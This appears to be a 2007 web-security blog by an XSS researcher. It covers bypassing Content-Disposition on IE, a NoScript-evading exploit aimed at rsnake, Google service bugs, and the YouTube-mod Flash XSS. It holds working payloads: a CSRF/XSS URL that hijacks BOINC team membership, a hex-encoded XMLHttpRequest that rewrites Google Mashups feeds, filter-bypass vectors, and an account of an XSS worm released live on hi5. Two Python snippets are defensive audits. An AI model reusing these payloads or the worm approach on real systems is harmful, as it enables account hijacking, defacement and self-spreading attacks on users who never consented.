Sunday, December 30, 2007

Bypassing Content-Disposition: attachment for XSS on IE

Well, first of all I want to congratulate my friend kuza55 because his talk "Unusual Web Bugs" at 24c3 was a success.

I watched it on the stream, and even though it dropped every 2 minutes, the audio was sort of constant, so I was able to hear it.

So, it was awesome, and he used the stuff that was investigated and discovered lately, so it was a cutting-edge talk.

Anyway, I tried to send kuza a message for the Q&A that didn't arrive: when you say that the header Content-Disposition: attachment is a restriction that no one has been able to bypass, well, it's bypassable, and I dunno why I didn't tell you about this.. anyway..

Suppose that http://www.victim.com/downloads.php?file=999 is a downloader that sends the header Content-Disposition: attachment; then you can make IE display the content as its "best guess" by caching it first, like this:

<script src="http://www.victim.com/downloads.php?file=999"></script>
<iframe src="http://www.victim.com/downloads.php?file=999"></iframe>

The iframe will load the cached source, and it will show the best guess IE can make.

I haven't tested this on Firefox, sorry, but at least it works on IE 6 and 7.
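As an added example (not code from this post), here is a Python audit of a download endpoint's response headers for the conditions the trick above relies on, beside a hardened header set; the header values it flags, and the constructed "what downloads.php sends" sample, are this example's own assumptions.

```python
# Added example: audit a forced-download response for the three things the
# IE cache trick needs (a sniffable type, no nosniff, a cacheable response),
# and build hardened headers to compare against.

# Content-Type values for which a browser "best guess" is most likely when the
# cached body is later rendered inline: none at all, or a generic text type.
SNIFF_PRONE_TYPES = {"", "text/plain"}


def _normalize(headers):
    """Lower-case header names and trim values so lookups are case-insensitive."""
    return {name.strip().lower(): value.strip() for name, value in headers.items()}


def audit_download_headers(headers):
    """Return a list of findings for a response meant to be a forced download.

    An empty list means none of the audited weaknesses is present.
    """
    h = _normalize(headers)
    findings = []

    disposition = h.get("content-disposition", "").lower()
    if not disposition.startswith("attachment"):
        findings.append("Content-Disposition is not 'attachment'; the body renders inline")

    media_type = h.get("content-type", "").split(";", 1)[0].strip().lower()
    if media_type in SNIFF_PRONE_TYPES:
        findings.append("Content-Type {!r} invites content sniffing".format(media_type))

    if h.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("X-Content-Type-Options: nosniff is missing")

    directives = {d.strip().lower() for d in h.get("cache-control", "").split(",")}
    if "no-store" not in directives:
        findings.append("response is cacheable, so a second load can replay it from cache")

    return findings


def hardened_download_headers(filename, media_type="application/octet-stream"):
    """Headers for serving user-supplied content strictly as a download.

    The filename is reduced to a safe quoted-string: CR/LF are dropped so it
    cannot inject a header, and quotes and backslashes are escaped.
    """
    safe_name = "".join(ch for ch in filename if ch not in "\r\n")
    safe_name = safe_name.replace("\\", "\\\\").replace('"', '\\"')
    return {
        "Content-Type": media_type,
        "Content-Disposition": 'attachment; filename="{}"'.format(safe_name),
        "X-Content-Type-Options": "nosniff",
        "Cache-Control": "no-store",
    }


# Constructed sample (assumption): a downloader that only sets the attachment
# header and lets the body go out as text/plain, cacheable.
POST_STYLE_HEADERS = {"Content-Disposition": "attachment", "Content-Type": "text/plain"}


if __name__ == "__main__":
    for finding in audit_download_headers(POST_STYLE_HEADERS):
        print("weak:", finding)
    print("hardened:", audit_download_headers(hardened_download_headers("report.txt")))
```

X-Content-Type-Options: nosniff postdates this post (it arrived with IE 8), so for the IE 6/7 case the content-type and cache findings are the ones that matter.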

So, that's mostly all, just wanted to say that..

Greetz!!

Monday, December 24, 2007

Making a Social Network XSS Worm (hi5.com)

Well, the last couple of days I've been playing with hi5.

It's pretty cool, and I found a couple of XSS vulnerabilities.

I reported them to help@hi5.com, security@hi5.com, admin@hi5.com and all the e-mails I found on the domain hi5.com.

Well, they didn't respond.

So, there's an XSS worm for hi5 in the wild.

The worm is on the following profile (if you visit it through this domain you won't get infected; the problem arises if you visit it through the www.hi5.com domain):

http://xssworm.hi5.com/

I'll warn you that the profile may be deleted by hi5 staff at any time.

I'll give an explanation of how this worm works as soon as it's controlled by the hi5 team, since it doesn't use XHR.. and some people asked me in the past if it is possible to do a worm without XHR.

To the hi5 team: there are a lot of vulnerabilities on your website; if you wish, I could help you with them, just respond to the freaking e-mails.

cya!

UPDATE

I've finally been contacted by the hi5 team; we are working on solving the XSS & CSRF vulnerabilities.

Wednesday, November 21, 2007

CSK2 and CSS Applications

This week I've sort of improved the CSK of Gareth Heyes, with a few more event handlers and interoperability with Opera (and menus!!).

This new version is over here:
http://www.sirdarckcat.net/csk2.html

Anyway, with the research I did, I also found the vast world of possibilities implied by CSS.

Starting from CSK2, I've developed a game made in CSS with no JavaScript (anyway, you can only play once).. which currently works on all browsers, except for IExplorer.

I also used this knowledge to make my final project at the university (it was just making a website.. haha): http://da-vinci.awardspace.com/ This works only on Firefox (don't tell my teacher, :P)

In other news, thornmaker and I were trying to prove that CSS + HTML is Turing complete; anyway, since we don't have a way to make real loops (even though we had some ideas about including bindings that include themselves until a condition is met, which could work as recursion), it "appears" that CSS+HTML is NOT Turing complete.. anyway, I'll continue investigating to be sure.

Greetz!!

Thursday, November 08, 2007

Inside History of hacking rsnake for fun and pagerank.

Well, the research made for the exploit for the joke on rsnake is sort of interesting, so I'll try to explain what was needed (even though it was unsuccessful).

This was made with the help of research by the members of sla.ckers like ascii, Gareth Heyes, rsnake, Jeremiah Grossman, thornmaker, Wisec, kuza55 and me.

It exploited a bug and a feature from ha.ckers.org:

And a feature from Firefox:

Some bugs from NoScript:
  • XBL frame injection to bypass NoScript's IFrame protection.
  • setter/name NoScript anti-XSS filter bypass.
(these bugs have been patched since version 1.1.7.8 of NoScript)

You can read the comments from Robert Hansen and Giorgio Maone about this exploit at ha.ckers.org and hackademix.net (oh, Jeremiah Grossman also talked about this here, and some others in languages that I don't understand).

The only thing the exploit required was that rsnake had ha.ckers.org whitelisted on NoScript, but it didn't succeed for that and some other secret reasons.

For targeting the exploit just at rsnake, and hiding it from other people, we did 3 things.

First, we checked if rsnake had ha.ckers.org/blog/wp-admin/post-new.php in his history via a CSS history check without JavaScript.

If this was unsuccessful because of the "SafeHistory" plugin, or for any other reason, we checked whether his IP had access to the ha.ckers.org/blog/wp-admin/wp-admin.css stylesheet; if it had, we would try to exploit it.

For doing that we played with the display:block/display:none properties of iframes, but in case rsnake had NoScript's iframe protection enabled the exploit would be unsuccessful, so we added a -moz-binding for detecting NoScript's presence and replacing the iframe with a frameset/frame.

With that, we just redirected rsnake to the payload; the problem was that NoScript detects reflected XSS attacks, so we needed to find a way to bypass it, and we did.. (http://ha.ckers.org/xss.swf?a=0:0;a/**/setter=eval;b/**/setter=atob;a=b=name;)

That in un-obfuscated code is:

eval(atob(window.name)).

atob = base64 decode.

The reason this bug works was a mystery at the beginning, but after Wisec reconstructed the AS2 bytecode he saw that there were some variables being appended to the URL, and after some more research this is the reason these guys found out (explained by kuza55):

the Flash file looked like this:

getURL("javascript:('XSS')", "_self", "GET");
stop();

That third parameter turned out to be the key (though we only found this by an absolute fluke); initially we just assumed that the third parameter was just saying it should be a GET request, but the third argument actually does more:

[www.adobe.com]

getURL(url [, window [, "variables"]])

[snip]

variables: A GET or POST method for sending variables. If there are no variables, omit this parameter. The GET method appends the variables to the end of the URL, and is used for small numbers of variables. The POST method sends the variables in a separate HTTP header and is used for sending long strings of variables.

Now, seeing as in AS2 all variables which are passed on the URL are imported into the global scope (like register_globals), we get it sent with the request. Now, seeing as there was no semicolon at the end of the first argument, we were able to abuse the fact that the ? is not only the thing separating the variables in the URL from the file, but is also the JavaScript ternary operator.

So we simply used this to finish off a valid statement using the ternary operator, and then specified our XSS.

The window.name trick doesn't require JavaScript doing window.name="payload".. it just required a frame named as we wanted.. (<iframe name="payload">). Since NoScript replaces any char matching [^a-z0-9_\-] in window.name with a space, we needed to encode the payload in base64 and remove all the "+" and "/" chars from it via whitespacing where they were shown.

So, we posted a comment with a link that might attract the attention of rsnake when moderating the comments, and we only needed to wait..

Then we saw the anti-climax.. the comment was approved, and the payload wasn't triggered.. lol (hey spammers)

So we did another post, now with a link that appeared to be spam, and we did..
http://owaspnj.blogspot.com.

Anyway, that comment wasn't approved, and the exploit in there (which was clearly better hidden than the ultimatehxr.googlepages.com one) wasn't necessary.

So you can see the exploit here (it's commented :D):

http://www.sirdarckcat.net/blah2.html


If you want to know what blah1.html is, it's just how we were trying to detect the wp-admin.css.

The last thing is to explain how the payload works.

1.- Via XMLHttpRequest, it asked for the /post-new.php source code.
2.- It created an iframe, and wrote inside that iframe the source code with a.. <base target="/wp-admin">
3.- Then it submitted the first form, modifying the title, content and tags fields, and clicking on publish (yeah, we wanted the payload to have tags).
4.- And that was all, no RegEx.match for finding nonces, nothing :P..

You can see the content of the post as it would appear if the exploit had succeeded here:
http://rsnakex.wordpress.com/

Greetz!!

Saturday, October 13, 2007

Vulns of Google that were, and are not?

Well, these are the bugs at Google services that, even though they are fixed now, were around for a while.

First I have to say that the Google Security Team (yeah, that sounds like a hacking team xD) responded very well and quickly, many times the same day or 1 day after the report.

In an exchange of 35 mails (give or take) between us, the following vulnerabilities were reported and fixed:

1.- XSS at GWT/MDP < http://www.google.com/gwt/mdp/x/en/detect/1?manually=true&brand=sirdackcat&model=sirdarckcat.net%3Cscript%3Ealert(document.cookie);%3C/script%3E >

The response to this mail had the following signature:

Erik, Google Security Team
NOTE: This message was sent by a human.

:P r0cks
The vulnerability was reported on July 27, and fixed on August 4.

2.- A CSRF+XSS vuln in Google Pages + Google Apps For Your Domain

1.- You need to make your victim log in to the attacker's GoogleAppsForYourDomain (Google Pages) account.. doing that is not difficult.. you can make a simple script that submits a form the same way:
https://www.google.com/a/ DOMAIN /ServiceLogin
It's important to take into consideration that the attacker will reveal the user and password (of his GoogleAppsForYourDomain account) to the victim.

2.- Once your victim is logged in, you make your victim go to a "preview" cached version of a page that has a script.. and that's all.

It sounds difficult, but it wasn't; the preview page could be reached with just 1 token that was revealed during the sign-up process.

Well, that one was reported on August 19 and fixed on September 4.

Then, the same day, there was another one, now in the editing page.
3.- Another XSS+CSRF vuln in Google Pages + Google Apps For Your Domain.

In an unpublished page, add this code:
<iframe src="javascript:alert(123);"></iframe>

and then when you leave the site the code will be executed, and every time someone enters that page.. (or leaves). This could also be used to attack Google Apps pages when there is more than 1 admin.

Well, this one had a PoC, and was pretty cool :P, but it had some usernames and passwords, so if I release it the PoC won't last a second.. ¬¬

4.- Data Spoofing at Google Analytics.
Well, this one is still "live", so I won't go into many details.
An attacker can make someone using Google Analytics believe that they came from your site (referrer) even if they haven't; they can make them change the URL of the activity report of a certain user, and a lot of cool stuff based on this.

5.- Google Mashups, XSS and Design Flaw.
lol, I've already reported this one here.. the XSS doesn't exist anymore, and the design flaw won't be fixed.

6.- Youtube redirection?
It's not a vulnerability in YouTube, but in some plugins that abuse it.. here it is.

7.- More cool stuff still about to be patched.
yeah, well, there are a few other vulns that will probably get fixed in the following weeks :P

For the guys that have asked me in the past, "why do you do this for free?" well, that's because.. it's like a hobby, I use Google a lot, and I am curious.. I have a very cool Google T-shirt, and well, maybe in the future I can make my name appear over here..

Greetz!!

Sunday, September 30, 2007

Universal youtube mods XSS explained in 7 steps

Well, I want to explain first that this was not my idea; someone at irc.irchighway.net/#slackers discussed this a while ago, but he wasn't able to find a redirection URL at YouTube.

A couple of days ago I found such a URL, and now I can't remember who he was; please, if you read this, send me an e-mail so I can modify this post for the credits.

[[ UPDATE ]] kuza55 found out that Kyran was the one to come with the idea [[ /UPDATE ]]

Well, discussing this with the guys at w4ck1ng, it appears that the vulnerability is rather complex to understand.

  1. First, we know that if we can embed a Flash movie into a site, we can make XSS attacks by means of getURL("javascript:code_here");
  2. Second, we know that we can't embed any arbitrary movie into any forum (at least not by default).
  3. Third, we know there are thousands of forums that have YouTube mods installed, so their users can link to movies and watch them without leaving the site.
  4. Fourth, the mods for YouTube (at least the ones I found) have no regular expressions for validating that the video linked is valid, and they do: http://www.youtube.com/v/{param_here} thinking that in such a way an attacker won't be able to change the domain.
  5. Fifth, YouTube doesn't have any visible redirection URL that forwards to an arbitrary site, so if you found a redirection page, you could do.. http://www.youtube.com/v/../redirection?page=http://your.swf.exploit/
  6. Sixth, the redirection page inside YouTube is http://www.youtube.com/confirm_email?next=http://new.url/
  7. Seventh, using steps 4, 5 and 6 the exploit is like this: [youtube=1,1]../confirm_email?next=http://exploit.com/swf[/youtube]
Well, I think that's all.. the easiest way of patching this vulnerability is simply adding allowScriptAccess="never" to the object tag of your mod.. anyway, attackers will still be able to redirect to their movies; to stop that you need a regular expression that matches the input against ^[a-zA-Z0-9_]{11}$
(like the phpBB mod does)
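As an added example (not the mods' own code, nor the post's), the fix described in steps 4 to 7 in Python: the unvalidated concatenation the vulnerable mods do beside a validator using the post's pattern and an object tag carrying allowScriptAccess="never"; the sample video id and the object-tag layout are this example's own assumptions.

```python
import html
import re

# The post's pattern: exactly 11 characters of [a-zA-Z0-9_].  Real video ids
# also contain '-', so a mod would add it to the class; it is kept as written
# here because it is the pattern the post gives.
VIDEO_ID_RE = re.compile(r"^[a-zA-Z0-9_]{11}$")

YOUTUBE_BASE = "http://www.youtube.com/v/"


def is_valid_video_id(value):
    """True only for a bare 11-character id; '../', '?', '/' and '=' all fail."""
    return isinstance(value, str) and VIDEO_ID_RE.fullmatch(value) is not None


def unsafe_embed_url(param):
    """What the vulnerable mods do: prepend the fixed host and trust the rest.

    Because nothing is validated, '../confirm_email?next=...' walks out of /v/
    into YouTube's redirector, so the fixed host guarantees nothing.
    """
    return YOUTUBE_BASE + param


def safe_embed_tag(param):
    """Validated id, attribute-escaped, plus allowScriptAccess="never" so the
    loaded movie cannot call into the page even if a redirect is ever found."""
    if not is_valid_video_id(param):
        raise ValueError("not a YouTube video id: {!r}".format(param))
    url = html.escape(YOUTUBE_BASE + param, quote=True)
    return (
        '<object type="application/x-shockwave-flash" data="{0}">'
        '<param name="movie" value="{0}">'
        '<param name="allowScriptAccess" value="never">'
        "</object>"
    ).format(url)


if __name__ == "__main__":
    # Constructed inputs: a well-formed id and the post's step-7 traversal.
    for candidate in ("dQw4w9WgXcQ", "../confirm_email?next=http://exploit.com/swf"):
        verdict = "valid" if is_valid_video_id(candidate) else "rejected"
        print(candidate, "->", verdict)
```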

[EDIT]
List of vulnerable SMF mods:

Not vulnerable:

Unsafe IPB YouTube mod installation:
[/EDIT]

Friday, September 28, 2007

Google Mashups Vulnerability

yay, I wanted to be part of this hell of a week (Google's Dark Week).

Here is the vulnerability I reported to google, and it appears to be a "design error" (and there is no fix, without breaking other things).

With this vulnerability you can "deface" any Google Mashups project, creating your own XML-RPC to the GWT server, and change the contents of any feed.

The report I sent to Google is this:






Suppose you are the creator of http://gallery.googlemashups.com/
If you include a list for a local feed, then any attacker in the world will be able to modify all the content on your website.

This is maybe a design error, and as I see it, it's pretty difficult to fix.

I've made a demonstration on http://gallery.googlemashups.com/
Enter the website and go to the last page; there you will see that the last item was modified.

To do so, you just need to execute the following code:


with(new XMLHttpRequest()){
open("POST","http://gallery.googlemashups.com/feeds/app/galleryApps",true);
setRequestHeader("Content-Type","application/atom+xml; charset=utf-8");
setRequestHeader("X-Gm-Validate","ASDFGHJKLÑPQWERRTYUIOPZXCVBNMUJHFDDDEFFDSSCFGGTFDQWERTYUIYTRREWWWQQ");
setRequestHeader("X-GData-Client","JavaScript-V1.0-Google Mashup Editor");
send(unescape("%3c%3f%78%6d%6c%20%76%65%72%73%69%6f%6e%3d%22%31%2e%30%22%20%65%6e%63%6f%64%69%6e%67%3d%22%55%54%46%2d%38%22%20%3f%3e%0d%0a%3c%61%74%6f%6d%3a%65%6e%74%72%79%20%78%6d%6c%6e%73%3a%67%6d%64%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%6d%64%2f%32%30%30%37%22%20%67%3d%22%63%6f%6d%2e%67%6f%6f%67%6c%65%2e%67%77%74%2e%63%6f%72%65%2e%63%6c%69%65%6e%74%2e%4a%61%76%61%53%63%72%69%70%74%4f%62%6a%65%63%74%22%20%78%6d%6c%6e%73%3a%61%74%6f%6d%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%35%2f%41%74%6f%6d%22%20%78%6d%6c%6e%73%3a%67%64%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%2f%32%30%30%35%22%20%78%6d%6c%6e%73%3a%67%6d%3d%22%68%74%74%70%3a%2f%2f%62%61%73%65%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%6e%73%2d%6d%65%74%61%64%61%74%61%2f%31%2e%30%22%20%78%6d%6c%6e%73%3a%67%3d%22%68%74%74%70%3a%2f%2f%62%61%73%65%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%6e%73%2f%31%2e%30%22%20%78%6d%6c%6e%73%3a%67%43%61%6c%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%43%61%6c%2f%32%30%30%35%22%20%78%6d%6c%6e%73%3a%73%74%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%73%74%2f%32%30%30%36%22%20%78%6d%6c%6e%73%3a%61%70%70%73%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%61%70%70%73%2f%32%30%30%36%22%20%78%6d%6c%6e%73%3a%78%73%6c%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%31%39%39%39%2f%58%53%4c%2f%54%72%61%6e%73%66%6f%72%6d%22%20%78%6d%6c%6e%73%3a%78%68%74%6d%6c%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%31%39%39%39%2f%78%68%74%6d%6c%22%20%78%6d%6c%6e%73%3a%6f%70%65%6e%53%65%61%72%63%68%3d%22%68%74%74%70%3a%2f%2f%61%39%2e%63%6f%6d%2f%2d%2f%73%70%65%63%2f%6f%70%65%6e%73%65%61%72%63%68%72%73%73%2f%31%2e%30%2f%22%20%78%6d%6c%6e%73%3a%6d%65%64%69%61%3d%22%68%74%74%70%3a%2f%2f%73%65%61%72%63%68%2e%79%61%68%6f%6f%2e%63%6f%6d%2f%6d%72%73%73%22%20%78%6
d%6c%6e%73%3a%67%65%6f%72%73%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%67%65%6f%72%73%73%2e%6f%72%67%2f%67%65%6f%72%73%73%3d%67%65%6f%72%73%73%22%20%78%6d%6c%6e%73%3a%67%6d%6c%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%6f%70%65%6e%67%69%73%2e%6e%65%74%2f%67%6d%6c%3d%67%6d%6c%22%20%78%6d%6c%6e%73%3a%65%78%69%66%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%70%68%6f%74%6f%73%2f%65%78%69%66%2f%32%30%30%37%3d%65%78%69%66%22%20%78%6d%6c%6e%73%3a%67%6d%73%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%6d%73%2f%32%30%30%37%22%20%78%6d%6c%6e%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%35%2f%41%74%6f%6d%22%3e%0d%0a%3c%69%64%3e%68%74%74%70%3a%2f%2f%67%61%6c%6c%65%72%79%2e%67%6f%6f%67%6c%65%6d%61%73%68%75%70%73%2e%63%6f%6d%2f%66%65%65%64%73%2f%61%70%70%2f%67%61%6c%6c%65%72%79%41%70%70%73%2f%31%3c%2f%69%64%3e%0d%0a%3c%70%75%62%6c%69%73%68%65%64%3e%32%30%30%37%2d%30%39%2d%30%38%54%30%30%3a%31%39%3a%34%38%2e%36%32%35%5a%3c%2f%70%75%62%6c%69%73%68%65%64%3e%0d%0a%3c%75%70%64%61%74%65%64%3e%32%30%30%37%2d%30%39%2d%30%38%54%30%30%3a%31%39%3a%34%38%2e%36%32%35%5a%3c%2f%75%70%64%61%74%65%64%3e%0d%0a%3c%74%69%74%6c%65%20%74%79%70%65%3d%22%74%65%78%74%22%3e%4d%4f%44%49%46%49%45%44%21%21%21%21%21%21%21%21%21%21%21%21%3c%2f%74%69%74%6c%65%3e%0d%0a%3c%63%6f%6e%74%65%6e%74%20%74%79%70%65%3d%22%74%65%78%74%22%3e%4d%4f%44%49%46%49%45%44%21%21%21%21%21%21%21%21%21%21%21%3c%2f%63%6f%6e%74%65%6e%74%3e%0d%0a%3c%6c%69%6e%6b%20%72%65%6c%3d%22%73%65%6c%66%22%20%74%79%70%65%3d%22%61%70%70%6c%69%63%61%74%69%6f%6e%2f%61%74%6f%6d%20%78%6d%6c%22%20%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%31%2e%31%2e%74%65%73%74%2d%63%32%62%61%34%61%39%39%36%35%35%36%39%31%65%61%2e%67%6f%6f%67%6c%65%6d%61%73%68%75%70%73%2e%63%6f%6d%2f%66%65%65%64%73%2f%61%70%70%2f%67%61%6c%6c%65%72%79%41%70%70%73%2f%31%22%2f%3e%0d%0a%3c%6c%69%6e%6b%20%72%65%6c%3d%22%65%64%69%74%22%20%74%79%70%65%3d%22%61%70%70%6c%69%63%61%74%69%6f%6e%2f%61%
74%6f%6d%20%78%6d%6c%22%20%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%31%2e%31%2e%74%65%73%74%2d%63%32%62%61%34%61%39%39%36%35%35%36%39%31%65%61%2e%67%6f%6f%67%6c%65%6d%61%73%68%75%70%73%2e%63%6f%6d%2f%66%65%65%64%73%2f%61%70%70%2f%67%61%6c%6c%65%72%79%41%70%70%73%2f%31%2f%30%22%2f%3e%0d%0a%3c%67%64%3a%61%70%70%4c%69%6e%6b%3e%6a%61%76%61%73%63%72%69%70%74%3a%61%6c%65%72%74%28%27%47%6f%6f%67%6c%65%4d%61%73%68%75%70%73%20%64%65%73%69%67%6e%20%65%72%72%6f%72%3f%27%29%3b%3c%2f%67%64%3a%61%70%70%4c%69%6e%6b%3e%0d%0a%3c%67%64%3a%69%6d%67%55%52%4c%3e%6a%61%76%61%73%63%72%69%70%74%3a%61%6c%65%72%74%28%27%47%6f%6f%67%6c%65%4d%61%73%68%75%70%73%20%64%65%73%69%67%6e%20%65%72%72%6f%72%3f%27%29%3b%3c%2f%67%64%3a%69%6d%67%55%52%4c%3e%0d%0a%3c%67%6d%64%3a%61%75%74%68%6f%72%3e%4d%4f%44%49%46%49%45%44%21%21%21%21%21%21%21%21%21%21%3c%2f%67%6d%64%3a%61%75%74%68%6f%72%3e%0d%0a%3c%2f%61%74%6f%6d%3a%65%6e%74%72%79%3e"));
onreadystatechange=function(){
if(readyState==4){
alert(responseText);
}
}
}


You can get the X-Gm-Validate token by sniffing your own connection; the modification of the feeds doesn't require validation of any type.

Well, that's the first part..
With this information you can modify the content of any item on the feed, but that's not all.
The information passed is not validated at all! So by means of..
link=blah">XSS

I could do a persistent XSS attack; this could completely destroy the project, make a deface or anything.

If you need me to explain further please tell me.





Well, actually there's also another XSS vulnerability in some other services; anyway, they are on their way to fixing them.. so I won't disclose them here (yet).

Thursday, September 06, 2007

Allowing debug in a javascript library

Hi, some days ago I watched John Resig's Tech Talk about building a JavaScript library, where he pointed out some "good habits" when programming and when doing JS libraries; pretty interesting.

Anyway, he mentioned that we shouldn't use try&catch because the coder "can't" debug his code: we trap the error, and he is never able to see it.. so I thought that an interesting way of letting the "error pass", but still having control of the library, is using setTimeout to let the code run asynchronously.

The code I submitted to his blog, is:

setTimeout(function(){/*code here*/},0);

So, the error is reported to the user, and we don't lose control of the code..

Some time after that I thought that it could also be used for keeping code running in memory.. (but it's cancelled as soon as you leave the website).

Anyway, as a programmer I see this as a technique for running more than 1 process at once; as a security researcher, I see this as a technique for running XSS payloads in a stealthier way.

Saturday, September 01, 2007

7 minutes to kill a monster.

Well, a response time of 1 week is said to be good; Mozilla has 10 f***ing days; Google, depending on the complexity of the vulnerability, takes between 1 day and a few weeks to fix them; but Mario Heiderich, developer of PHP-IDS, has an amazing 7 minute time to pull a patch for a vuln.

A week ago, he told me about a "call for hacking" for PHP-IDS, and I said it would be really difficult, because the last time the filters were extremely strict, so I started playing (before the call for hacking was published), and in an hour I found 3 vectors and made a PoC of 666 bytes (that's why it's a monster xD); 2 of them were based on Giorgio Maone's window.name vector.

So I asked Mario if I had to wait until the call for hacking was published, but he pulled the patch immediately.

A few minutes later, I found another HTML vector ("style="anything), that was fixed too.

So he decided to interview me, as a prize for winning an unstarted contest :P.

The vectors were:

  • open(name)
  • eval(name)
  • (1?(1?{a:1?""[1?"ev\a\l":0](1?"\a\lert":0):0}:0).a:0)[1?"\c\a\l\l":0](content,1?"x\s\s":0)
I'm sure that Gareth Heyes, and Giorgio Maone will be the next to find some vectors :)

Thursday, August 23, 2007

SHA-1 Collision Search Graz XSS and CSRF

A couple of days ago, at elhacker.net, they showed a project for finding SHA-1 collisions.
After I registered, I found out that there was a "competition" between teams for winning credits.
http://boinc.iaik.tugraz.at/sha1_coll_search/top_teams.php

So, after checking out how it worked, I found a CSRF and an XSS in the team search engine.

So I made a simple exploit that will change your team to.. BOINC Confederation.

The XSS vuln is here:
http://boinc.iaik.tugraz.at/team_lookup.php?team_name=XSS&search=Search

The CSRF vuln is in all forms..

The exploit (for firefox) is:
http://boinc.iaik.tugraz.at/team_lookup.php?team_name=%3Cscript%3Ewith(new%20XMLHttpRequest()){open(%22GET%22,%22http://boinc.iaik.tugraz.at/team_quit_form.php%22,false);send(null);x=responseText.match(/id%20value=([0-9]*)/)[1];open(%22POST%22,%22http://boinc.iaik.tugraz.at/team_quit_action.php%22,false);setRequestHeader(%22Content-Type%22,%22application/x-www-form-urlencoded%22);send(%22id=%22%2Bx);open(%22POST%22,%22http://boinc.iaik.tugraz.at/team_join_action.php%22,false);setRequestHeader(%22Content-Type%22,%22application/x-www-form-urlencoded%22);send(%22teamid=1%22);}%3C/script%3E&search=Search

Pretty simple :P

So, by "stealing" a user from an important team.. you can make your team win; the list of the top users is here:
http://boinc.iaik.tugraz.at/top_users.php

Greetz!!

--EDIT--
The bug has been fixed :) It's good to see that someone actually reads my blog xD

Monday, August 06, 2007

JavaScript is just evil (for you) [ Part I ]

This is the first of 3 parts of the document entitled: "JavaScript is just evil".

Here are the first 2 chapters.

1.- DoSing the browser


You won't learn anything new in this first chapter; it's just a set of examples.

2.- Injecting code and tracing stack


Here we will see some attack vectors for chrome privilege escalation.



In them I will demonstrate, by several code examples, how JavaScript can be used for evil.

This started a while ago, when, while chatting with Giorgio Maone and showing him an example that crashed Firefox (using intervals), he said in response.. "there's nothing we can do, javascript is just evil"..

The phrase "javascript is just evil" captivated me in such a way that I started thinking about the ways javascript could be used for evil.

Now, I divided the document into 3 sections, and those into 5 chapters.

JavaScript is just evil (for you).
  1. DoSing the browser
  2. Injecting code and tracing stack

JavaScript is just evil (for your server).
  3. XSS Worms
  4. DOM Level XSS

JavaScript is just evil (for your local files).
  5. Local Files Privileges and HTA's



I hope you like them!

Morfi! the Human readable+HTML+JavaScript file all in one..

Here I present a file that will appear different depending on which application you open it with.
As plain text, it will describe how it works; as HTML, it will define XSS; and as JavaScript
it will pop up a simple alert(document.cookie+window.location); XSS PoC.

Opened as plain text (just reading the words in the code):

This HTML file is a PoC on how complex the HTML and JavaScript code can get and
here, with the use of style and changing the visibility to hidden on some non
style elements, we will hide and show some parts of js code and HTML, we will also make
Function and a javascript alert that shows a document cookie and the window location, a
script that takes as src the same file, and executes the code inside the script
and a HTML file that is also XML valid, and will define XSS.

Opened as JavaScript:

alert(document.cookie+window.location);

Opened as HTML in Firefox:

this, "the attack based on accessing and modifying a webpage in the context of other domain" is the function of XSS attacks.

It will also show an alert, produced by including itself as a javascript script.

http://www.sirdarckcat.net/morfi.html

This was submitted for The Month of Hacker Folklore at GNUCITIZEN.

Saturday, August 04, 2007

Google teaches security basics

It's rather simple.. and it deals with vulns at the "server level" (no sqli, rfi, xss, etc..) anyway..

http://code.google.com/edu/content/submissions/web_security/listing.html

Lectures

Coding Projects



It has 2 slide shows and 1 problem set.

Thanks to crack_x for showing me the code.google.com/edu site.

Discuss here: http://sla.ckers.org/forum/read.php?13,14409

Sunday, July 29, 2007

DoSing Firefox with Error Consoles

3 days ago, I found out that there was a way of popping up the Firefox JavaScript Error Console, by doing:

<iframe src="javascript:"></iframe>

I was testing what I could do to exploit it (like trying to execute some code in the chrome:// context), but I wasn't able to..

This was 1 of my failed attacks.. to steal chrome context:

throw new function(){
  this.toString=this.valueOf=function(){
    alert(location);
    return "<script>alert(location);</script>";
  }
}


For the ones that don't know this, throw will "throw" an error exception.. :P

Anyway, then while playing with the multiple consoles I had, I realized that if, for example, you click "clear" on one console, all the consoles will clear their error messages.. so maybe the memory allocated at the time of showing errors won't be checked as well..

I made a PoC of a memory exhaustion exploit for Firefox (it's a DoS exploit, you have been warned), which I talked about with Giorgio Maone, and it appears that this is just a denial of service attack (which I think depends on the amount of RAM the victim has; for example, RSnake just suffered a temporary freezing of the browser, and after closing the error consoles everything went back to normal). ma1 told me to file it on Bugzilla anyway (which I did today), but I don't know for sure if a memory exhaustion bug will be considered a real bug at Mozilla.. anyway, NoScript users are already invulnerable to this attack (since yesterday, I think).

Friday, July 27, 2007

Temporal Cache Poisoning (IExplorer and Firefox) = Feature?

While making estigma's EditHTML() function (a WYSIWYG editor), I realized that the modified code stays in the cache until you close the browser, or leave the website and enter again.

At the time I was too busy to check it deeply, and I guessed it had something to do with the removeNode function I was using.. Anyway, yesterday I resumed the investigation, and it appears that the only thing you need to modify the cached version of a website is to access:

